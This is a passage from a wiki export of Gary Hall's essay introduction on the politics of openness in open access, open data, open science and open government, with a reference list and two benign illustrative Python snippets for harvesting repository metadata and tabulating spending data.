http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Birchall, C. (2011a), ‘&amp;quot;There's Been Too Much Secrecy in this City&amp;quot;: The False Choice Between Secrecy and Transparency in US Politics’, ''Cultural Politics'' 7(1), March: 133-156.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Birchall, C. (2011b, forthcoming), ‘Transparency, Interrupted: Secrets of the Left’, Between Transparency and Secrecy, Annual Review, ''Theory, Culture and Society'', December.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Blair, T. (2010), ''A Journey''. London: Hutchinson. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clinton, H. (2010), ‘Internet Freedom’, the prepared text of U.S. Secretary of State Hillary Rodham Clinton's speech, delivered at the Newseum in Washington, D.C., January 21. http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, D. (2010), ‘Searching for the Victorians’, ''Dan Cohen'', October 4. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, P. (2010), ‘Digital Keys for Unlocking the Humanities’ Riches’, ''The New York Times'', November 16. http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;amp;hp=&amp;amp;amp;pagewanted=all. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Croxall, B.
(2010), response to Tanner Higgen, ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. September 10. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze, G. and Guattari, F. (1988), ''A Thousand Plateaus: Capitalism and Schizophrenia''. London: Athlone. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze, G. and Guattari, F. (1994), ''What is Philosophy?''. New York: Columbia University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fung, A., Graham, M. and Weil, D. (2007), ''Full Disclosure: The Perils and Promise of Transparency''. Cambridge: Cambridge University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Frabetti, F. (2010), ‘Digital Again? The Humanities Between the Computational Turn and Originary Technicity’, talk given to the Open Media Group, Coventry School of Art and Design. November 9. http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Franklin, K. D. and Rodriguez’G, K. (2008), ‘The Next Big Thing in Humanities, Arts and Social Science Computing: Cultural Analytics’, ''HPC Wire''. July 29. http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gibbs, R. (2010), presidential press secretary, cited in ‘White House condemns WikiLeaks' release’, ''MSNBC.com News'', November 28. http://www.msnbc.msn.com/id/40405589/ns/us_news-security. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010a), ‘Open Data: Empowering the Empowered or Effective Data Use for Everyone?’, ''Gurstein’s Community Informatics'', September 2. http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010b), ‘Open Data (2): Effective Data Use’, ''Gurstein’s Community Informatics'', September 9. http://gurstein.wordpress.com/2010/09/09/open-data-2-effective-data-use/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2011), ‘Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide’, posting to the nettime mailing list, July 5. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hall, G. (2010), ‘We Can Know It For You: The Secret Life of Metadata’, ''How We Became Metadata''. London: Institute for Modern and Contemporary Culture, University of Westminster. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Higgen, T. (2010), ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. May 25. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hindman, M. (2009), ''The Myth of Digital Democracy''. Princeton, NJ and Oxford: Princeton University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hoffman, M. (2010), ‘EFF Posts Documents Detailing Law Enforcement Collection of Data From Social Media Sites’, ''Electronic Frontier Foundation''. March 16. http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Houghton, J. (2009), ‘Open Access - What are the Economic Benefits?: A Comparison of the United Kingdom, Netherlands and Denmark’, Centre for Strategic Economic Studies, Victoria University, Melbourne.
http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Jarvis, J. (2010), ‘Time For Citizens of the Internet to Stand Up’, ''The Guardian: MediaGuardian'', March 29. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; JISC (2009), ‘Press Release: Open Science - the Future for Research?’, posting to the BOAI list, November 16, 2009. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Kerssens, N. and Dekker, A. (2009), ‘Interview with Lev Manovich for Archive 2020’, ''Virtueel Platform''. http://www.virtueelplatform.nl/#2595. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Knouf, N. (2010), ‘The JJPS Extension: Presenting Academic Performance Information’, ''Journal of Journal Performance Studies'', Vol 1, No 1. Available at http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6. Accessed 20 June, 2010. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Latour, B. (2004), ‘Why Has Critique Run Out of Steam? From Matters of Fact to Matters of Concern’, ''Critical Inquiry'', Vol. 30, Number 2. http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Liu, A. (2011), ‘Where is Cultural Criticism in the Digital Humanities’, paper presented at the panel on ‘The History and Future of the Digital Humanities’, Modern Language Association convention, Los Angeles, January 7. http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J.-F. (1986), ''The Postmodern Condition: A Report on Knowledge''. Manchester: Manchester University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J.-F. (1991), ''The Inhuman: Reflections on Time''. Cambridge: Polity. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2010a), ‘Cultural Analytics Lectures by Manovich in UK (London and Swansea), March 8-9, 2010’, ''Software Studies Initiative''. March 8. http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2011), ‘Trending: The Promises and the Challenges of Big Social Data’, ''Lev Manovich'', April 28: http://www.manovich.net/DOCS/Manovich_trending_paper.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meeks, E. (2010), ‘The Digital Humanities as Imagined Community’, ''Digital Humanities Specialist''. September 14. https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mintel (2010), ‘Energy Efficiency in the Home - UK - July 2010’, Mintel report. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Murray, S., Choi, S., Hoey, J., Kendall, C., Maskalyk, J. and Palepu, A. (2008), ‘Open Science, Open Access and Open Source Software at ''Open Medicine''’, ''Open Medicine'', 2(1): e1–e3. http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/?tool=pmcentrez http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Patterson, M. (2009), ‘Article-Level Metrics at PLoS – Addition of Usage Data’, ''PLoS: Public Library of Science''. September 16. http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Pubget (2010), ‘[BOAI] PLoS Launches Fast (Open) PDF Access with Pubget’, posted on the BOAI list by Peter Suber, March 8. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Poynder, R.
(2010), ‘Interview With Jean-Claude Bradley: The Impact of Open Notebook Science’, ''Information Today'', September. http://www.infotoday.com/IT/sep10/Poynder.shtml. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2008), ‘Sunset for Ideology, Sunrise for Methodology?’, ''Found History'', March 13. http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010a), ‘Where’s the Beef?: Does Digital Humanities Have to Answer Questions?’, ''Found History'', May 12. http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010b), response to Dan Cohen, ‘Searching for the Victorians’, ''Dan Cohen''. October 5. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Shields, R. (2010), ‘Green Fatigue Hits Campaign to Reduce Carbon Footprint’, ''The Independent'', October 10. http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Sterling, B. (2005), ''Shaping Things''. Cambridge, MA: MIT Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stolberg, S. G. (2009), ‘On First Day, Obama Quickly Sets a New Tone’, ''The New York Times''. January 21. http://www.nytimes.com/2009/01/22/us/politics/22obama.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swan, A. (2009), ‘Open Access and Open Data’, ''2nd NERC Data Management Workshop'', Oxford. February 17-18. http://eprints.ecs.soton.ac.uk/17424/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swartz, A. (2010), ‘When is Transparency Useful?’, ''Aaron Swartz’s Raw Thought'' blog, February 11. http://www.aaronsw.com/weblog/usefultransparency. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Vaidhyanathan, S. (2009), ‘The Googlization of Universities’, ''The NEA 2009 Almanac of Higher Education''. http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wark, M. (2004), ''A Hacker Manifesto''. Cambridge, MA: Harvard University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Westcott, S. (2009), ‘Global Warming: Brits Deny Humans are to Blame’, ''The Express'', December 7. http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The White House (2009), ‘Memorandum for the Heads of Executive Departments and Agencies: Transparency and Open Government’. January 21. http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wollen, P. and Cooke, L. (eds) (1995), ''Visual Display: Culture Beyond Appearances''. Seattle: Bay Press.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5501</id>
		<title>Open science/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5501"/>
		<updated>2013-11-03T14:51:00Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: /* Gary Hall */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me Back to the book] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
= '''White Noise: On the Limits of Openness (Living Book Mix)'''  =&lt;br /&gt;
&lt;br /&gt;
= Gary Hall  =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;PH54cp2ggFk&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the explicit aims of the Living Books About Life series is to provide a 'bridge' or point of connection, translation, even interrogation and contestation, between the humanities and the sciences. Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from (in this case) ''computer science'' and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being used to produce new ways of approaching and understanding texts in the humanities; what is sometimes thought of as ‘the digital humanities’. The concern in the main has been with either digitizing ‘born analog’ humanities texts and artifacts (e.g. making annotated editions of the art and writing of [http://www.blakearchive.org/blake/ William Blake] available to scholars and researchers online), or gathering together ‘born digital’ humanities texts and artifacts (videos, websites, games, photography, sound recordings, 3D data), and then taking complex and often extremely large-scale data analysis techniques from computing science and related fields and applying them to these humanities texts and artifacts – to this ‘big data’, as it has been called. Witness Lev Manovich and the Software Studies Initiative’s use of ‘[http://www.manovich.net/DOCS/Manovich_trending_paper.pdf digital image analysis and new visualization techniques]’ to study ‘20,000 pages of Science and Popular Science magazines… published between 1872-1922, 780 paintings by van Gogh, 4535 covers of Time magazine (1923-2009) and one million manga pages’ (Manovich, 2011), and Dan Cohen and Fred Gibbs’s text mining of ‘[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader the 1,681,161 books that were published in English in the UK in the long nineteenth century]’ (Cohen, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; What ''Digitize Me, Visualize Me, Search Me'' endeavours to show is that such data-focused transformations in research can be seen as part of a major alteration in the status and nature of knowledge. It is an alteration that, according to the philosopher Jean-François Lyotard, has been taking place since at least the 1950s, and involves nothing less than a shift away from a concern with questions of what is right and just, and toward a concern with legitimating power by optimizing the social system’s performance in instrumental, functional terms. This shift has significant consequences for our idea of knowledge. Indeed, for Lyotard: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The nature of knowledge cannot survive unchanged within this context of general transformation. It can fit into the new channels, and become operational, only if learning is translated into quantities of information. We can predict that anything in the constituted body of knowledge that is not translatable in this way will be abandoned and that the direction of new research will be dictated by the possibility of its eventual results being translatable into computer language. The ‘producers’ and users of knowledge must now, and will have to, possess the means of translating into these languages whatever they want to invent or learn. Research on translating machines is already well advanced. Along with the hegemony of computers comes a certain logic, and therefore a certain set of prescriptions determining which statements are accepted as ‘knowledge’ statements. (1986: 4)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In particular, ''Digitize Me, Visualize Me, Search Me'' suggests that the turn in the humanities toward data-driven scholarship, science visualization, statistical data analysis, etc. can be placed alongside all those discourses that are being put forward at the moment – in both the academy and society – in the name of greater openness, transparency, efficiency and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Access ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The open access movement provides a case in point. Witness [http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf John Houghton’s] 2009 comparison of the benefits of OA for the United Kingdom, Netherlands and Denmark, which claims to show that the open access academic publishing model, in which peer-reviewed scholarly research and publications are made available for free online to all those who are able to access the Internet, is actually the most cost-effective mechanism for scholarly publishing. Others meanwhile have detailed the increases open access publishing enables in the amount of material that can be published, searched and stored, in the number of people who can access it, in the impact of that material, the range of its distribution, and in the speed and ease of reporting and information retrieval. The following announcement, posted on the BOAI (Budapest Open Access Initiative) list in March 2010, is fairly typical in this respect: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Today PLoS released Pubget links across its journal sites. Now, when users are browsing thousands of reference citations on PLoS journals they will be able to get to the full text article faster than ever before. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Specifically, when readers encounter citations to articles as recorded by CrossRef (which are accessed via the ‘CrossRef’ link in the ‘Cited in’ section of any article’s Metrics tab), a PDF icon will also appear if it is freely available via Pubget. Clicking on the icon will take you directly to the PDF. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; On launching this new functionality, Pete Binfield, Publisher of PLoS ONE and the Community Journals, said: ‘Any service, like Pubget, that makes it easier for authors to quickly find the information they need is a welcome addition to our articles. We like how Pubget helps to break down content walls in science, letting users get instantly to the article-level detail that they seek.’ (Pubget, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
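&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The machine-level openness such announcements celebrate rests largely on standard protocols like OAI-PMH, through which open access repositories expose their metadata for searching and harvesting. A minimal sketch of such a harvest (the repository address below is a placeholder, not a real endpoint): &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;
&amp;lt;pre&amp;gt;
# A minimal sketch of harvesting repository metadata over OAI-PMH,
# the protocol most open access archives use to expose their records.
# The base URL is a placeholder, not a real endpoint.
import requests
import xml.etree.ElementTree as ET

BASE = "https://repository.example.org/oai"
DC = "{http://purl.org/dc/elements/1.1/}"

response = requests.get(
    BASE, params={"verb": "ListRecords", "metadataPrefix": "oai_dc"}
)
root = ET.fromstring(response.content)

# Print the Dublin Core title of every harvested record.
for title in root.iter(DC + "title"):
    print(title.text)
&amp;lt;/pre&amp;gt;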
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Data ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet it is not just the research literature that is positioned as being rendered more accessible by scientists. Even the data created in the course of scientific research is promoted as being made freely and openly available for others to use, analyse and build upon. This includes data sets that are too large to be included in any resulting peer-reviewed publications. Known as open data, or data-sharing, this initiative is motivated by the idea that publishing data online on an open basis endows it with a [http://eprints.ecs.soton.ac.uk/17424/1/Swan_-_NERC_09.pptx ‘vastly increased utility’]. Digital data sets are said to be ‘easily passed around’; they are seemingly ‘more easily reused’, reanalysed and checked for accuracy and validity; and they supposedly contain more ‘opportunities for educational and commercial exploitation’ (Swan, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, certain academic publishers are already viewing the linking of their journals to the underlying data as another of the ‘value-added’ services they can offer, to set alongside automatic alerting and sophisticated citation, indexing, searching and linking facilities (and no doubt to help ward off the threat of disintermediation posed by the development of digital technology, which enables academics to take over the means of dissemination and publish their work for and by themselves cheaply and easily). Significantly, a [http://www.jisc.ac.uk/publications/documents/opensciencerpt.aspx 2009 JISC report] also identified ‘open-ness, predictive science based on massive data volumes and citizen involvement as [all] being important features of tomorrow’s research practice’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a further move in this direction, all Public Library of Science (PLoS) journals are now providing a broad range of article-level metrics and indicators relating to usage data on an open basis. No longer withheld as trade secrets, these metrics reveal which articles are attracting the most views, citations from the scholarly literature, social bookmarks, coverage in the media, comments, responses, ‘star’ ratings, blog coverage, and so on. PLoS has positioned this programme as enabling science scholars to assess [http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/ ‘research articles on their own merits rather than on the basis of the journal (and its impact factor) where the work happens to be published’], and they encourage readers to carry out their own analyses of this open data (Patterson, 2009). Yet it is difficult not to perceive such article-level metrics and management tools as also being part of the wider process of transforming knowledge and learning into ‘quantities of information’ (Lyotard, 1986: 4); quantities, furthermore, that are produced more to be exchanged, marketed and sold (1986: 4) – for example, by individual academics to their departments, institutions, funders and governments in the form of indicators of ‘quality’ and ‘impact’ (1986: 5). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''From Open Science to Open Government ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such developments around open access and open data are themselves part of the larger trend or phenomenon that is coming to be known as ‘open science’. As Murray et al put it: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Open science is emerging as a collaborative and transparent approach to research. It is the idea that all data (both published and unpublished) should be freely available, and that private interests should not stymie its use by means of copyright, intellectual property rights and patents. It also embraces open access publishing and open source software… (Murray et al, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting and well known examples of how such open science may work is provided by the Open Notebook Science of the organic chemist Jean-Claude Bradley. ‘[I]n the interests of openness’, Bradley is making the [http://www.infotoday.com/IT/sep10/Poynder.shtml ‘details of every experiment done in his lab freely available on the web']. This ‘includes all the data generated from these experiments too, even the failed experiments’. What is more, he is doing so in ‘real time’, ‘within hours of production, not after the months or years involved in peer review’ (Poynder, 2010). Again, we can see how emphasis is being placed on the amount of research that can be shared, and the speed with which this can be achieved. This openness on Bradley’s part is also positioned as a means of achieving usefulness and impact, as is evident from the very title of one of his Open Notebook Science projects, [http://usefulchem.wikispaces.com/ UsefulChem]. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; To be fair, however, such discourses around openness, transparency, efficiency and utility are not confined to the sciences – or even the university, for that matter. There are also wider political initiatives, dubbed ‘Open Government’, or ‘Government 2.0’, with both the Labour and the Conservative/Liberal Democrat coalition administrations in the UK making a great display of freeing government information. The Labour government passed the Freedom of Information (FOI) Act in 2000, and then proceeded to launch a [http://www.data.gov.uk website] expressly dedicated to the release of governmental data sets in January 2010. It is a website that the current Conservative/Liberal Democrat coalition government continues to make extensive use of. In a similar vein, the [http://www.freeourdata.org.uk/ Guardian] newspaper has campaigned for the UK government to relinquish its copyright on all local, regional and national data collected with taxpayers’ money and to make such data freely and openly available to the public by publishing it online, where it can be collectively and collaboratively scrutinized, searched, mined, mapped, graphed, cross-tabulated, visualized, audited and interpreted using software tools. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Nor is this phenomenon confined to the UK. In the United States Barack Obama promised throughout his election campaign to make government more open. He followed this up by issuing a memorandum on transparency the very first day after he became President, vowing to make openness one of [http://www.nytimes.com/2009/01/22/us/politics/22obama.html ‘the touchstones of this presidency’] (Obama, cited in Stolberg, 2009): ‘[http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ My Administration] is committed to creating an unprecedented level of openness in Government. We will work together to ensure the public trust and establish a system of transparency, public participation, and collaboration. Openness will strengthen our democracy and promote efficiency and effectiveness in Government’ (The White House, 2009).
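&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; What the citizen scrutiny imagined by these campaigns might look like in practice can be sketched in a few lines of code (the dataset, file name and column names below are hypothetical stand-ins for the kind of spending data released via data.gov.uk): &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;
&amp;lt;pre&amp;gt;
# A minimal sketch of the kind of citizen audit the open government
# campaigns envisage: cross-tabulating a published spending dataset.
# The file name and column names are hypothetical.
import pandas as pd

spending = pd.read_csv("gov_spending_2010.csv")

# Total spend per department per month, as a simple cross-tabulation.
table = pd.crosstab(
    index=spending["department"],
    columns=spending["month"],
    values=spending["amount"],
    aggfunc="sum",
)
print(table)

# Flag the ten largest single payments for closer scrutiny.
print(spending.nlargest(10, "amount"))
&amp;lt;/pre&amp;gt;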
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''The Politics of Openness''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The connection I am making here between the movements for open access, open data, open science and open government is one that has to a certain extent already been pointed to by Michael Gurstein in his reflections on the experience of attending the 2011 conference of the [http://okfn.org/ Open Knowledge Foundation]. For Gurstein: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ the ‘open data/open government’ movement] begins from a profoundly political perspective that government is largely ineffective and inefficient (and possibly corrupt) and that it hides that ineffectiveness and inefficiency (and possible corruption) from public scrutiny through lack of transparency in its operations and particularly in denying to the public access to information (data) about its operations. And further that this access once available would give citizens the means to hold bureaucrats (and their political masters) accountable for their actions. In doing so it would give these self-same citizens a platform on which to undertake (or at least collaborate with) these bureaucrats in certain key and significant activities—planning, analyzing, budgeting that sort of thing. Moreover through the implementation of processes of crowdsourcing this would also provide the bureaucrats with the overwhelming benefits of having access to and input from the knowledge and wisdom of the broader interested public. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Put in somewhat different terms but with essentially the same meaning—it’s the taxpayer’s money and they have the right to participate in overseeing how it is spent. Having “open” access to government’s data/information gives citizens the tools to exercise that right. (Gurstein, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, for Gurstein, we need a much clearer understanding than many open data/open government advocates have displayed to date of what exactly is meant by openness, and of where arguments in favour of open access, open information and open data are likely to lead us in the not too distant future. With this in mind, we could endeavour to put some flesh on the bones of Gurstein’s sketch of the politics of openness and suggest that, from a liberal perspective, freeing publicly funded and acquired information and data – whether it is gathered directly in the process of census collection, or indirectly as part of other activities (crime, healthcare, transport, schools and accident statistics) – is seen as helping society to perform more efficiently. For liberals, openness is said to play a key role in increasing citizen trust, participation and involvement in democracy, and indeed government, as access to information – such as that needed to intervene in public policy – is no longer restricted either to the state or to those corporations, institutions, organizations and individuals who have sufficient money and power to acquire it for themselves. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such liberal beliefs find support in the idea that making information and data freely and transparently available goes along with Article 19 of The Universal Declaration of Human Rights. The latter states that everyone has the right [http://www.un.org/en/documents/udhr/index.shtml ‘to seek, receive and impart information and ideas through any media and regardless of frontiers’]. Hillary Clinton, the United States Secretary of State, put forward a similar vision when, at the beginning of 2010, she said of her country that ‘[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full We stand for a single internet] where all of humanity has equal access to knowledge and ideas’, and against the authoritarian censorship and suppression of free speech and online search facilities like Google in countries such as China and Iran. Clinton declared: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full Even in authoritarian countries], information networks are helping people discover new facts and making governments more accountable. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; During his visit to China in November [2009], President Obama held a town hall meeting with an online component to highlight the importance of the internet. In response to a question that was sent in over the internet, he defended the right of people to freely access information, and said that the more freely information flows, the stronger societies become. He spoke about how access to information helps citizens to hold their governments accountable, generates new ideas, and encourages creativity. The United States' belief in that truth is what brings me here today. (Clinton, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This political sentiment was shared by Jeff Jarvis, author of ''What Would Google Do?'', when, in support of Google’s decision to stop self-filtering search results in China, he argued in March 2010 for a bill of rights for cyberspace: ‘[http://www.buzzmachine.com/2010/03/27/a-bill-of-rights-in-cyberspace/ to claim and secure our freedom] to connect, speak, assemble, and act online; to each control our identities and data; to speak our languages; to protect what is public and private; and to assure openness’ (Jarvis, 2010: 4). Yet are Clinton and Jarvis not both guilty here of overlooking (or should that be conveniently forgetting or even denying) the way liberal ideas of freedom and openness (and, indeed, of the human) have long been used in the service of colonialism and neoliberal globalisation? Does freedom for the latter not primarily mean economic freedom, i.e., freedom of the market, freedom of the consumer to choose what to consume – not only in terms of goods, but also lifestyles and ways of being? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Even if it was before the widespread use of networked computers, it is interesting that ‘fifteen years after the Freedom of Information Act law was passed’ in the US in 1966, ‘the General Accounting Office reported that 82 percent of requests [for information] came from business, nine percent from the press, and only 1 percent from individuals or public interest groups’ (Fung et al, 2007: 27-28). Certainly, in the UK today, the ‘truth is that the [UK] FOI Act [2000] isn't used, for the most part, by “the people”’, as Tony Blair acknowledged in his recent memoir. ‘It's used by journalists’ (Blair, 2010) – and by businesses, one might add. In view of this, it is no surprise to find that neoliberals also support the making of government data freely and openly available to businesses and the public. They do so on the grounds that it provides a means of achieving the best possible ‘input/output ratio’ for society (Lyotard, 1986: 54). This way of thinking is of a piece with the emphasis placed by neoliberalism’s audit culture on accountability, transparency, evaluation, measurement and centralised data management: for example, in the context of UK higher education, it is evident in the emphasis placed on measuring the impact of research on society and the economy, teaching standards, 